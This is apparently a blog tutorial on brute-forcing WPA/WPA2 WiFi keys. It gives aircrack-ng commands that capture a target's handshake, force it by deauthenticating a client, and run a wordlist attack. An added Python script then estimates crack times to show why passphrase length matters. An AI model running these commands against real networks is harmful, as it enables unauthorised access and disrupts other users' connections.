Brute Forcing WPA WiFi Encryption
Mar 19
Linux General, Networking, Wireless
WPA and WPA2 provide good WiFi security; their main practical weakness is a brute force (dictionary) attack against the pre-shared key once a handshake has been captured. Here is how such a brute force attack may be carried out.
Using Debian Wheezy (testing) and an Intel Corporation Centrino Wireless-N 1000 card:
- Stop Network Manager: /etc/init.d/network-manager stop
- Enter monitor mode: airmon-ng start wlan0
- Find nearby networks: airodump-ng mon0
- Identify the target BSSID and Channel number (-c option below)
- Start packet capture and leave it running: airodump-ng -c 6 --bssid 00:11:22:33:44:55 -w capturefile mon0
- Leave the packet capture running until "WPA Handshake" is seen (displayed in the top-right corner of airodump-ng)
- Or attempt to force a WPA handshake by deauthenticating a client station: aireplay-ng --deauth 1 -a 00:11:22:33:44:55 -c 55:55:55:55:55:55 --ignore-negative-one mon0 (where -c is the MAC address of one of the stations displayed in airodump-ng)
- Apply brute force: aircrack-ng -w password.lst capturefile.cap
- The password.lst is included in the 'test/' directory of the aircrack-ng source. Many others are available for download
- Stop monitor mode: airmon-ng stop mon0
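Whether the wordlist step above succeeds comes down to the cost of a single guess and the size of the passphrase space. The script below is an added example, not code from the original post or from the aircrack-ng project: it derives the WPA/WPA2-Personal pre-shared key the way the 802.11 standard specifies, times one derivation on the local CPU, and projects how long exhausting a few passphrase spaces would take. The passphrase/SSID pair used is a constructed sample.

```python
import hashlib
import math
import time


def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """Pairwise Master Key for WPA/WPA2-Personal: PBKDF2-HMAC-SHA1 over the
    passphrase, salted with the SSID, 4096 iterations, 32-byte output.
    A wordlist attack must pay this cost for every candidate before the
    result can be checked against the captured handshake."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), 4096, 32)


def measure_guess_rate(ssid: str, samples: int = 50) -> float:
    """Approximate single-core PMK derivations per second on this machine."""
    start = time.perf_counter()
    for i in range(samples):
        wpa_pmk(f"candidate{i:06d}", ssid)  # constructed throwaway guesses
    return samples / (time.perf_counter() - start)


def keyspace_size(alphabet_size: int, length: int) -> int:
    """Number of passphrases of exactly `length` characters over the alphabet."""
    return alphabet_size ** length


def entropy_bits(candidates: int) -> float:
    """log2 of the keyspace, the usual measure of passphrase strength."""
    return math.log2(candidates)


def years_to_exhaust(candidates: int, guesses_per_second: float) -> float:
    """Worst-case time to try every candidate at the given rate."""
    return candidates / guesses_per_second / (365 * 24 * 3600)


if __name__ == "__main__":
    # Constructed sample passphrase/SSID pair; the derivation is deterministic.
    print("PMK:", wpa_pmk("password", "IEEE").hex())
    rate = measure_guess_rate("IEEE")
    print(f"~{rate:.0f} PMK derivations/s on one core")
    for label, alphabet, length in [("8 lowercase", 26, 8),
                                    ("8 printable ASCII", 95, 8),
                                    ("12 lowercase", 26, 12),
                                    ("20 printable ASCII", 95, 20)]:
        n = keyspace_size(alphabet, length)
        print(f"{label:20s} {entropy_bits(n):6.1f} bits  "
              f"{years_to_exhaust(n, rate):10.3g} years to exhaust")
```

The figures it prints are worst-case for a single CPU core; dedicated hardware raises the rate, which is why passphrase length and randomness, not the cipher, decide the outcome of the aircrack-ng step.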